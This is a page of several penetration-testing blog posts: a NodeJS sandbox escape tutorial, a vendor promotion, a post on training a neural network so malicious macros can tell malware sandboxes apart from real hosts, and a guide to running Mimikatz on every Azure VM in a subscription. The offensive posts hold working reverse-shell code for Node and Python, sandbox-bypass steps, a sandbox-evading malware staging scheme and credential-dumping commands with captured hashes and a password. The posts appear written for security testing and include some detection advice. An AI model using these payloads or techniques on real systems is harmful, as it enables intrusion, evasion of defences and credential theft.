Back

Escape NodeJS Sandboxes

In this blog post, we’re going to explore how to escape NodeJS sandboxes by understanding the internals of the interpreter.

NodeJS is a JavaScript runtime built on Chrome’s V8 JavaScript engine, allowing developers to use the same programming language, and possibly codebase, for the frontend and backend of an application. Initially released in 2009, NodeJS now boasts usage by big-named tech companies such as Netflix, Microsoft, and IBM. Today, NodeJS has been downloaded more than 250,000,000 times and continues to grow. This popularity and wide-spread usage makes it an interesting target for exploration from a web application testing persepctive.

Before NodeJS, it was required to use different server-side languages, such as PHP or Perl, which have security issues of their own. However, while NodeJS and JavaScript offer improvements, they are no different when it comes to command injection thanks to the eval() feature.

The eval function allows applications to execute commands at the operating system level. When there’s functionality that doesn’t exist between the operating system and the application, or it’s easier to offload the work to the underlying system, developers will turn to eval . Eventually, the use of this feature leads to the implementation of varying levels of sandboxing to prevent attackers like us from having the run of the underlying server.

Now, let’s deep dive into NodeJS and find out how you can try and escape from a NodeJS sandbox in an app that lets you execute arbitrary JavaScript.

Reverse Shell

Spend enough time as a pentester, and reverse shells become second nature. Identifying opportunities to initiate a reverse connection becomes trivial and that’s when the real fun begins. Thanks to Wiremask, we have a barebones reverse shell we can use in NodeJS:

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "192.168.1.1", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();

If you’re lucky and the sandboxing is weak, or non-existent, you’ll receive a reverse shell and can move on with your day. Unfortunately, things don’t always work out; we’ll walk through figuring out how to execute a reverse shell without require in the current environment. This is a common sandboxing technique and acts as a first-step defense from attackers. If you can’t import NodeJS standard libraries, you can’t easily do things such as read/write files to the operating system or establish network connections. Now, the real work begins.

Recon

The first step of any pentester’s methodology is recon. We thought we were in the clear by identifying arbitrary command execution but because of the sandboxing we have to start from square one. Our first big step will be to identify what access our payload has while executing. The most straight forward way to do this is to trigger a stack trace and view the output. Unfortunately, not all web apps will simply dump the stack trace or standard error back at you. Luckily, we can use a payload to generate and print a stack trace to standard out. Using this StackOverflow post we see that the code is actually quite simple, especially with newer language features. Without direct console access we have to use a print statement or return the actual trace, which the following code will do:

function stackTrace() {
var err = new Error();
print(err.stack);
}

After running this payload, we’ll get a stack trace:

Error
at stackTrace (lodash.templateSources[3354]:49:19)
at eval (lodash.templateSources[3354]:52:11)
at Object.eval (lodash.templateSources[3354]:65:3)
at evalmachine.:38:49
at Array.map ()
at resolveLodashTemplates (evalmachine.:25:25)
at evalmachine.:59:3
at ContextifyScript.Script.runInContext (vm.js:59:29)
at Object.runInContext (vm.js:120:6)
at /var/www/ClientServer/services/Router/sandbox.js:95:29
...

Huzzah, we know we’re in sandbox.js, running in a lodash template using eval. Now, we can try to figure out our current code context.
We’ll want to try printing this but we can’t simply print the object. We’ll have to use JSON.stringify():

> print(JSON.stringify(this))
< TypeError: Converting circular structure to JSON

Unfortunately this has some circular references, meaning we need a script that can identify these references and truncate them. Conveniently, we can embed JSON.prune into the payload:

> print(JSON.prune(this))
< {
"console": {},
"global": "-pruned-",
"process": {
"title": "/usr/local/nvm/versions/node/v8.9.0/bin/node",
"version": "v8.9.0",
"moduleLoadList": [ ... ],
...
}

The original JSON.prune doesn’t support enumerating available functions. We can modify the case "function" results to output the function’s name giving a better mapping of the functions available. Running this payload will give a substantial output which has some interesting items. First, there’s this.process.env which contains the environment variables of the current process and may contain API keys or secrets. Second, this.process.mainModule contains configurations for the currently running module; you may also find other application-specific items that warrant further investigation, such as config file locations. Finally, we see this.process.moduleLoadList which is a list of all NodeJS modules loaded by the main process, which holds the secret to our success.

NodeJS Giving Us The Tools For Success

Lets narrow in on moduleLoadList in the main process. If we look at the original reverse shell code, we can see the two modules we need: net and child_process, which should be loaded already. From here, we research how to access modules loaded by the process. Without require, we have to use internal libraries and APIs used by NodeJS itself. Reading through the NodeJS documentation for Process, we see some promise with dlopen(). We’re going to skip over this option however because, while it may work out with enough research, there is an easier way: process.binding(). Continuing on through the NodeJS source code itself, we’ll eventually come to fs.js, the NodeJS library for File I/O. In here we see process.binding('fs') is being used. There isn’t much documentation on how this works but we know this will return the fs module. Using JSON.prune, modified to print out the function names, we can explore our functionality:

> var fs = this.process.binding('fs');
> print(JSON.prune(fs));
< {
"access": "func access()",
"close": "func close()",
"open": "func open()",
"read": "func read()",
...
"rmdir": "func rmdir()",
"mkdir": "func mkdir()",
...
}

After further research, we learn that these are the C++ bindings used by NodeJS and using their appropriate C/C++ function signatures will allow us to read or write. With this, we can start exploring the local filesystem and potentially gaining SSH access by writing a public key to ~/.ssh/authorized_keys or reading ~/.ssh/id_rsa. However, it’s common practice to isolate virtual machines from direct access and proxy the traffic. We want to initiate a reverse shell connection to bypass this network restriction. To do this, we’ll look at trying to replicate the child_process and net packages.

Mucking about the Internals

At this point, the best path forward is researching functionality in the C++ bindings in the NodeJS repository. The process involves reading the relevant JS library (such as net.js) for a function you want to execute, then tracing the functionality back to the C++ bindings in order to piece everything together. We could rewrite net.js without require but there’s an easier way: as it turns out CapcitorSet on GitHub did much of the heavy lifting and rewrote the functionality to execute an operating system level command without require: spawn_sync. The only changes we need to make to the gist are: change process.binding() to this.process.binding() and console.log() to print() (or remove it entirely). Next, we need to figure out what we can use to initiate the reverse shell. This is typical post-exploitation recon, looking for netcat, perl, python, etc with a payload running which <binary name> , for instance which python. In this case, we have Python and the respective payload on highon.coffee‘s reverse shell reference:

var resp = spawnSync('python',
['-c',
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("127.0.0.1",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
]
);
print(resp.stdout);
print(resp.stderr);

Make sure to update the "127.0.0.1" and 443 values to point to the internet-accessible IP address and port, respectively, that netcat is listening on. When we run the payload we see the sweet victory of a reverse shell:

root@netspi$ nc -nvlp 443
Listening on [0.0.0.0] (family 0, port 443)
Connection from [192.168.1.1] port 443 [tcp/*] accepted (family 2, sport 48438)
sh: no job control in this shell
sh-4.2$ whoami
whoami
user
sh-4.2$ ifconfig
ifconfig
ens5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 9001
inet 192.168.1.1 netmask 255.255.240.0 broadcast 192.168.1.255
ether de:ad:be:ee:ef:00 txqueuelen 1000 (Ethernet)
RX packets 4344691 bytes 1198637148 (1.1 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4377151 bytes 1646033264 (1.5 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10
loop txqueuelen 1000 (Local Loopback)
RX packets 126582565 bytes 25595751878 (23.8 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 126582565 bytes 25595751878 (23.8 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Wrap Up

From arbitrary code execution to a reverse shell, we can break out of a sandbox in NodeJS; it’s only a matter of time. This problem was rampant with early backend languages for the web, such as PHP, and plagues us still. The lesson here is: never trust user input, and never execute user-provided code. Additionally, for pentesters, poking and proding at the internal workings of the interpreter is incredibly valuable for finding these obscure ways to break out of the sandbox. Using the system against itself, as we often know, will more often than not yield positive results.

Back

Five Signs Your Application Security Assessment Process Needs a Reboot

Many organizations use manually intensive processes when onboarding their application security assessments. Compare the following process with your own experience:

  • Schedule the application security assessment.
  • Assign internal/external penetration testers to conduct the test.
  • Conduct the application security assessment and/or vulnerability scan.
  • Report application vulnerabilities to the remediation team using a method of copy-and-paste. from various systems.
  • Report multiple duplicates and false positives that had been verified previously.

With a process like the one above, your organization will struggle with delayed timelines and duplicate efforts. And because the process is manual, each step in your lifecycle is prone to human-error. In highly regulated industries, this wasteful approach consumes valuable resources, when resources are already lacking.

Ask the following five questions to assess the strength of your organization’s vulnerability management program:

  • Does your organization have multiple ways for application owners to request application assessments?
  • Do you struggle to scope the assessment properly?  For example, can you acquire details such as how dynamic pages are within your web app, the number of user roles, the application’s code language, etc.?
  • Do you have to follow-up with the application owners for more information or direction after the scoping questionnaires are emailed to the pentesting team?
  • After receiving completed questionnaires, do you send login credentials via email to conduct authenticated application security tests?
  • Do you email the pentesting team a copy of the concluded assessment results, regardless of the type of test: static application security testing (SAST), dynamic application security testing (DAST) or a manual penetration test?

If you rely on email and manual processes like these for your vulnerability management program, it is probably time for a vulnerability management program overhaul!

Reduce Your Administrative Overhead by 40% to 60%

Even without the headache of sifting through duplicate findings and incurring delays, we have found that organizations can spend a from 6 to 10 hours onboarding applications into the vulnerability assessment process. Organizations we’ve interviewed say this massive administrative overhead is reduced by 40%-60% with NetSPI Resolve™, the first commercially available security testing automation and vulnerability correlation software platform.

NetSPI Resolve reduces the time required to identify and remediate vulnerabilities, providing pentesters and their teams with comprehensive automated reporting, ticketing, and SLA management. By utilizing these Resolve features, along with the automation of questionnaire publication, organizations achieve streamlined communication and can complete vulnerability assessments faster, without sacrificing the quality of assessment results.

By reducing – and in some cases, even eliminating – the time needed for administrative tasks, pentesters are able to focus more on what they do best: test.

Back

Machine Learning for Red Teams, Part 1

TLDR: It’s possible to detect a sandbox using a process list with machine learning.

Introduction

For attackers, aggressive collection of data often leads to the disclosure of infrastructure, initial access techniques, and malware being unceremoniously pulled apart by analysts. The application of machine learning in the defensive space has not only increased the cost of being an attacker, but has also limited a techniques’ operational life significantly. In the world that attackers currently find themselves in:

  • Mass data collection and analysis is accessible to defensive software, and by extension, defensive analysts
  • Machine learning is being used everywhere to accelerate defensive maturity
  • Attackers are always at a disadvantage, as we as humans try to defeat auto-learning systems that use every bypass attempt to learn more about us, and predict future bypass attempts. This is especially true for public research, and static bypasses. 

However, as we will present here, machine learning isn’t just for blue teams. This post will explore how attackers can make use of the little data they have to perform their own machine learning. We will present a case study that focuses on initial access. By the end of the post, we hope that you will have a better understanding of machine learning, and how we as attackers can apply machine learning for our own benefit.

A Process List As Data

Before discussing machine learning, we need to take a closer look at how we as attackers process information. I would argue that attackers gather less than 1% of the information available to them on any given host or network, and use less than 3% of the collected information to make informed decisions (don’t get too hung up on the percentages). Increasing data collection efforts in the name of machine learning would come at a cost to stealth, with no foreseeable benefit. Gathering more data isn’t the best solution for attackers; attackers need to increase their data utilization. However, increasing data utilization is difficult due to the textual nature of command output. For example, other than showing particular processes, architecture, and users, what more can the following process list really provide?

PIDARCHSESSSYSTEM NAMEOWNERPATH
1x640smss.exeNT AUTHORITY\SYSTEM\SystemRoot\System32\smss.exe
4x640csrss.exeNT AUTHORITY\SYSTEMC:\Windows\system32\csrss.exe
236x640wininit.exeNT AUTHORITY\SYSTEMC:\Windows\system32\wininit.exe
312x640csrss.exeNT AUTHORITY\SYSTEMC:\Windows\system32\csrss.exe
348x641winlogon.exeNT AUTHORITY\SYSTEMC:\Windows\system32\winlogon.exe
360x641services.exeNT AUTHORITY\SYSTEMC:\Windows\system32\services.exe
400x640lsass.exeNT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exe
444x640lsm.exeNT AUTHORITY\SYSTEMC:\Windows\system32\lsm.exe
452x640svchost.exeNT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exe
460x640svchost.exeNT AUTHORITY\NETWORK SERVICEC:\Windows\system32\svchost.exe
564x640svchost.exeNT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exe
632x640svchost.exeNT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exe
688x640svchost.exeNT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exe
804x640svchost.exeNT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exe
852x640spoolsv.exeNT AUTHORITY\SYSTEMC:\Windows\System32\spoolsv.exe
964x640taskhost.exeAdmin-PC\AdminC:\Windows\system32\taskhost.exe
1004x641dwm.exeAdmin-PC\AdminC:\Windows\system32\Dwm.exe
1044x641svchost.exeNT AUTHORITY\LOCAL SERVICEC:\Windows\system32\svchost.exe
1052x640explorer.exeAdmin-PC\AdminC:\Windows\Explorer.EXE
1064x641svchost.exeNT AUTHORITY\NETWORK SERVICEC:\Windows\System32\svchost.exe
1120x640svchost.exeNT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exe
1188x640UI0Detect.exeNT AUTHORITY\SYSTEMC:\Windows\system32\UI0Detect.exe
1344x640svchost.exeNT AUTHORITY\NETWORK SERVICEC:\Windows\system32\svchost.exe
1836x640taskhost.exeNT AUTHORITY\LOCAL SERVICEC:\Windows\system32\taskhost.exe
1972x640taskhost.exeAdmin-PC\AdminC:\Windows\system32\taskhost.exe
508x641WinSAT.exeAdmin-PC\AdminC:\Windows\system32\winsat.exe
828x641conhost.exeAdmin-PC\AdminC:\Windows\system32\conhost.exe
652x641unsecapp.exeNT AUTHORITY\SYSTEMC:\Windows\system32\wbem\unsecapp.exe
684x640WmiPrvSE.exeNT AUTHORITY\SYSTEMC:\Windows\system32\wbem\wmiprvse.exe
2712x640conhost.exeAdmin-PC\AdminC:\Windows\system32\conhost.exe
2796x641svchost.exeNT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe
2852x640svchost.exeNT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe
2928x640svchost.exeNT AUTHORITY\SYSTEMC:\Windows\System32\svchost.exe

Textual data also makes it hard to describe differences between two process lists, how would you describe the differences between the process lists on different hosts?

A solution to this problem already exists – we can describe a process list numerically. Looking at the process list above, we can derive some simple numerical data:

  • There are 33 processes
  • The ratio of processes to users is 8.25
  • There are 4 observable users

By describing items numerically, we can start to analyze differences, rank, and categorize items. Let’s add a second process list.

Process List AProcess List B
Process Count33157
Process Count/Users8.25157
User Count41

Viewing the numerical descriptions side-by-side reveal clear differences between each process list. We can now measure a process list on any given host, without knowing exactly what processes are running. So far, that doesn’t seem so useful, but with the knowledge that Process List A is a sandbox, and Process List B is not, we can examine the four new process lists below. Which of them are sandboxes?

Process List CProcess List DProcess List EProcess List F
Process Count308419534
Process/User7.5841958.5
User Count4114

How might we figure this out? Our solution was to sum the values of each column, then calculate the average of the host totals. For each host total, below average values are marked as 1 for a sandbox, and above average values are marked as 0 for a normal host.

ABCDEF
Process Count33157308419534 
Process Count/User8.251577.5841958.5 
User Count414114Host Score Average
Host Total59.2531554.522648065.5168.04
Sandbox Score101001 

Our solution seems to work out well, however, it was completely arbitrary. It’s likely that before working through our solution, you had already figured out which process lists were sandboxes. Not only did you correctly categorize the process lists, but you did so without textual data against four process lists you’ve never seen! Using the same data points, we can use machine learning to correctly categorize a process list.

Machine Learning for Lowly Operators

The mathematic techniques used in machine learning attempt to replicate human learning. Much like the human brain has neurons, synapses, and electrical impulses that are all connected; artificial neural networks have nodes, weights, and an activation function that are all connected. Through repetition and making small adjustments between each iteration, both humans and artificial neural networks are able to adjust in order to get closer to an expected output. Effectively, machine learning attempts to replicate your brain with math. Both networks operate in a similar fashion as well.

In biology, an electrical impulse is introduced into a neural network, the electrical impulse travels across a synapse, and is processed by a neuron. The strength of the electrical impulse received from the synapse determines whether or not the neuron is activated. Performing the same action repeatedly strengthens the synapses between particular neurons.
In machine learning, an input is introduced into an artificial neural network. The input travels along a link weight into a node where it is passed into an activation function. The output of the activation function determines whether or not the node is activated. By iteratively examining outputs relative to a target value, link weights can be adjusted to reduce the error.

Artificial Neural Networks (ANNs) can have an arbitrary size. The network explored in this post has 3 inputs, 3 hidden layers, and a single output. One thing to notice about the larger ANN is the number of connections between each node. Each connection represents an additional calculation we can perform, both increasing the efficiency, and accuracy of the network. Additionally, as the ANN increases in size, the math doesn’t change (unless you want to get fancy), only the number of calculations.

Gathering and Preparing Data

Gathering a dataset of process lists is relatively easy. Any document with a macro will be executed in a sandbox by any half decent mail filter, and the rest are normal hosts. To get a process list from a sandbox, or a remote system, a macro will need to gather and post a process list back for collection and processing. For processing, the dataset needs to be parsed. The process count, process to user ratio, and unique process count need to be calculated and saved. Finally, each item in the dataset needs to be correctly labelled with either 0 or 1. Alternatively, the macro could gather the numerical data from the process list and post the results back. Choose your own adventure. We prefer to have the raw process list for operational purposes.

There is one more transformation we need to make to the process list data set. Earlier we compared the sum of each process list to the average of each process list total. Using an average in this way is problematic, as very large or very small process list results could adjust the average significantly. Significant shifts would reclassify potentially large numbers of hosts, introducing volatility into our predictions. To help with this, we scale (normalize) the data set. There are a few techniques to do this. We tested all the scaling functions from skikit-learn and chose the StandardScalar transform. What is important here is that overly large or small values no longer have such a volatile effect on classification. 

ABCDEF
Process Count-0.7861.285-0.836-0.0651.92-0.770
Process Count/User-0.5011.652-0.6630.5210.846-0.648
Unique Process Count0.812-0.9020.813-0.902-0.9020.813
Label101001

Building and Training a Network

The data used in the example above, is pulled from our data set. With it we can start to explore how machine learning can help attackers detect sandboxes. At a high level, in order to successfully train an artificial neural network, we will iteratively:

  1. Introduce scaled data into the artificial neural network.
  2. Calculate the output of the activation function.
  3. Provide feedback to the network in the form of 0 or 1 (its label).
  4. Calculate the difference between the output and the feedback.
  5. Update the link weights in an attempt to reduce the difference calculated in step 4.

Some of you may be wondering about step 3. A small, but significant, detail responsible for our earlier success at detecting a sandbox was the fact we told you “Process List A” was a sandbox. From then on, the values of Process List A provided a reference point for everything else. An artificial neural network requires a similar reference point in order to measure how “wrong” it was.

Using skikit-learn, we trained 3 models on 190 unique process lists. The data was scaled in 3 different ways, and even combined. In the end we simply chose the model that performed the best. When the network receives process list data it has never seen before, the network will (hopefully) output an accurate prediction.

Classifying a host as 1 or 0
Confidence level of prediction for the above categorization

The scratchpad code for the neural network can be found here. We opted not to explain all the math involved, although we did write it up. If you have questions feel free to send them our way. Otherwise, if you’re just generally interested, we highly recommend Tariq Rashids book, “Make your own neural network”.

Weaponizing An Artificial Neural Network

Time to put the ANN to work. To test our proof-of-concept, we wrote a simple macro that:

  1. Collected a process list
  2. Calculated the inputs (process count, process/user count, and user count)
  3. Posted the values back to our server and ran them through the neural network for a prediction
  4. If the neural network predicts a normal host, stage code, otherwise do nothing. 

Next, we uploaded the malicious document to several online malware scanners (virustotal, malware-analysis, etc) and waited. We executed the macro on a non-sandbox (first highlighted post-back), then after a few minutes 2 different sandboxes executed the macro and posted the calculated values back. Running the post-back values through the neural network provided 3 accurate predictions!

Macro post-backs (normal, sandbox, sandbox)
Probabilities and classifications for macro post-backs

From the predictions additional logic would be used to deploy malware or not.  Just to recap what we accomplished,

  1. Derived numerical values from a process list
  2. Built a dataset of those values, and properly scaled them
  3. Trained an artificial neural network to successfully categorize a sandbox, based on the dataset
  4. Wrote a macro to post-back required values
  5. Sent in some test payloads and used the post-back values to predict a categorization

Conclusion

Hopefully, this was a good introduction on how attackers can harness the power of machine learning. We were able to successfully classify a sandbox from the wild. Most notably, the checks were not static and harnessed knowledge of every process list in the data set. For style points, the network we created could be embedded in an Excel document, and make the checks client side.

Regardless, of where the ANN we created sits, machine learning will no doubt change the face of offensive security. From malware with embedded networks, to operator assistance, the possibilities are endless (and very exciting).

Credits and Sources

First and foremost, I want to thank Tariq Rashid (@rzeta0) for his book, “Make Your Own Neural Network”. It’s everything you want to know about machine learning, without all the “math-splaining.” Tariq also kindly answered a few questions I had along the way.

Secondly, I would like to thank James McAffrey of Microsoft for checking my math and giving me back some of my sanity.

If this post piqued your interest in machine learning, I highly recommend “Make Your Own Neural Network” as a starting place.

Here are some other links that were helpful to us (if you go down this road):

Back

Running PowerShell on Azure VMs at Scale

Let’s assume that you’re on a penetration test, where the Azure infrastructure is in scope (as it should be), and you have access to a domain account that happens to have “Contributor” rights on an Azure subscription. Contributor rights are typically harder to get, but we do see them frequently given out to developers, and if you’re lucky, an overly friendly admin may have added the domain users group as contributors for a subscription. Alternatively, we can assume that we started with a lesser privileged user and escalated up to the contributor account.

At this point, we could try to gather available credentials, dump configuration data, and attempt to further our access into other accounts (Owners/Domain Admins) in the subscription. For the purpose of this post, let’s assume that we’ve exhausted the read-only options and we’re still stuck with a somewhat privileged user that doesn’t allow us to pivot to other subscriptions (or the internal domain). At this point we may want to go after the virtual machines.

Attacking VMs

When attacking VMs, we could do some impactful testing and start pulling down snapshots of VHD files, but that’s noisy and nobody wants to download 100+ GB disk images. Since we like to tread lightly and work with the tools we have, let’s try for command execution on the VMs. In this example environment, let’s assume that none of the VMs are publicly exposed and you don’t want to open any firewall ports to allow for RDP or other remote management protocols.

Even without remote management protocols, there’s a couple of different ways that we can accomplish code execution in this Azure environment. You could run commands on Azure VMs using Azure Automation, but for this post we will be focusing on the Invoke-AzureRmVMRunCommand function (part of the AzureRM module).

This handy command will allow anyone with “Contributor” rights to run PowerShell scripts on any Azure VM in a subscription as NT AuthoritySystem. That’s right… VM command execution as System.

Running Individual Commands

You will want to run this command from an AzureRM session in PowerShell, that is authenticated with a Contributor account. You can authenticate to Azure with the Login-AzureRmAccount command.

Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript

Let’s breakdown the parameters:

  • ResourceGroupName – The Resource Group for the VM
  • VMName – The name of the VM
  • CommandId – The stored type of command to run through Azure.
    • “RunPowerShellScript” allows us to upload and run a PowerShell script, and we will just be using that CommandId for this blog.
  • ScriptPath – This is the path to your PowerShell PS1 file that you want to run

You can get both the VMName and ResourceGroupName by using the Get-AzureRmVM command. To make it easier for filtering, use this command:

PS C:> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name

ResourceGroupName    Name       
-----------------    ----       
TESTRESOURCES        Remote-Test

In this example, we’ve added an extra line (Invoke-Mimikatz) to the end of the Invoke-Mimikatz.ps1 file to run the function after it’s been imported. Here is a sample run of the Invoke-Mimikatz.ps1 script on the VM (where no real accounts were logged in, ).

PS C:> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
Value[0]        : 
  Code          : ComponentStatus/StdOut/succeeded
  Level         : Info
  DisplayStatus : Provisioning succeeded
  Message       :   .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28) .## ^ ##.  
 ## /  ##  /* * *
 ##  / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   https://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 15 modules * * */
 
mimikatz(powershell) # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NetSPI-Test
Domain            : WORKGROUP
SID               : S-1-5-20         
        msv :
         [00000003] Primary
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : NetSPI-Test
         * Domain   : WORKGROUP
         * Password : waza1234/ 
mimikatz(powershell) # exit 
Bye!   
Value[1] : Code : ComponentStatus/StdErr/succeeded 
Level : Info 
DisplayStatus : Provisioning succeeded 
Message : 
Status : Succeeded 
Capacity : 0 
Count : 0

This is handy for running your favorite PS scripts on a couple of VMs (one at a time), but what if we want to scale this to an entire subscription?

Running Multiple Commands

I’ve added the Invoke-AzureRmVMBulkCMD function to MicroBurst to allow for execution of scripts against multiple VMs in a subscription. With this function, we can run commands against an entire subscription, a specific Resource Group, or just a list of individual hosts.

You can find MicroBurst here – https://github.com/NetSPI/MicroBurst

For our demo, we’ll run Mimikatz against all (5) of the VMs in my test subscription and write the output from the script to a log file.

Import-module MicroBurst.psm1</code> <code>Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
Executing Mimikatz.ps1 against all (5) VMs in the TestingResources Subscription
Are you Sure You Want To Proceed: (Y/n):
VERBOSE: Running .Mimikatz.ps1 on the Remote-EastUS2 - (10.2.10.4 : 52.179.214.3) virtual machine (1 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EastUS2 - (10.2.10.4 : 52.179.214.3)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-EAsia - (10.2.9.4 : 65.52.161.96) virtual machine (2 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-EAsia - (10.2.9.4 : 65.52.161.96)
VERBOSE: Script Execution Completed in 99 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanE - (10.2.12.4 : 13.78.40.185) virtual machine (3 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanE - (10.2.12.4 : 13.78.40.185)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-JapanW - (10.2.13.4 : 40.74.66.153) virtual machine (4 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-JapanW - (10.2.13.4 : 40.74.66.153)
VERBOSE: Script Execution Completed in 69 seconds
VERBOSE: Running .Mimikatz.ps1 on the Remote-France - (10.2.11.4 : 40.89.130.206) virtual machine (5 of 5)
VERBOSE: Script Status: Succeeded
VERBOSE: Script output written to Output.txt
VERBOSE: Script Execution Completed on Remote-France - (10.2.11.4 : 40.89.130.206)
VERBOSE: Script Execution Completed in 98 seconds

Mimikatz Med

The GIF above has been sped up for demo purposes, but the total time to run Mimikatz on the 5 VMs in this subscription was 7 Minutes and 14 seconds. It’s not ideal (see below), but it’s functional. I haven’t taken the time to multi-thread this yet, but if anyone would like to help, feel free to send in a pull request here.

Other Ideas

For the purposes of this demo, we just ran Mimikatz on all of the VMs. That’s nice, but it may not always be your best choice. Additional PowerShell options that you may want to consider:

  • Spawning Cobalt Strike, Empire, or Metasploit sessions
  • Searching for Sensitive Files
  • Run domain information gathering scripts on one VM and use the output to target other specific VMs for code execution

Performance Issues

As a friendly reminder, this was all done in a demo environment. If you choose to make use of this in the real world, keep this in mind: Not all Azure regions or VM images will respond the same way. I have found that some regions and VMs are better suited for running these commands. I have run into issues (stalling, failing to execute) with non-US Azure regions and the usage of these commands.

Your mileage may vary, but for the most part, I have had luck with the US regions and standard Windows Server 2012 images. In my testing, the Invoke-Mimikatz.ps1 script would usually take around 30-60 seconds to run. Keep in mind that the script has to be uploaded to the VM for each round of execution, and some of your VMs may be underpowered.

Mitigations and Detection

For the defenders that are reading this, please be careful with your Owner and Contributor rights. If you have one take away from the post, let it be this – Contributor rights means SYSTEM rights on all the VMs.

If you want to cut down your contributor’s rights to execute these commands, create a new role for your contributors and limit the Microsoft.Compute/virtualMachines/runCommand/action permissions for your users.

Additionally, if you want to detect this, keep an eye out for the “Run Command on Virtual Machine” log entries. It’s easy to set up alerts for this, and unless the Invoke-AzureRmVMRunCommand is an integral part of your VM management process, it should be easy to detect when someone is using this command.

The following alert logic will let you know when anyone tries to use this command (Success or Failure). You can also extend the scope of this alert to All VMs in a subscription.

Alertlogic

As always, if you have any issues, comments, or improvements for this script, feel free to reach out via the MicroBurst Github page.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X